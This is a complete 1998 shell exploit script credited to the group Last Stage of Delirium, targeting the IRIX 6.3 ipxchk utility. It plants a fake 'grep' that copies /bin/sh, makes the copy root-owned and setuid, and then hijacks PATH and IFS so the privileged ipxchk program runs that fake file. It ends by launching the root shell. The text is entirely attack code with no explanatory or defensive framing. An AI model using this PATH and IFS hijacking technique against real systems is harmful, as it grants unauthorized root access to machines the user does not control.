#!/bin/sh
## copyright LAST STAGE OF DELIRIUM may 1998 poland            *://lsd-pl.net/ #
## /usr/etc/netware/ipxchk                                                     #

echo "copyright LAST STAGE OF DELIRIUM may 1998 poland  //lsd-pl.net/"
echo "/usr/etc/netware/ipxchk for irix 6.3 IP:all\n"

cat > grep << 'EOF'
    cp /bin/sh .
    chown root.sys sh
    chmod +s sh
EOF
chmod +x grep

PATH=.:/usr/etc/netware:$PATH
IFS=/
export PATH IFS

ipxchk -check
rm -f grep
IFS=
export IFS
sh

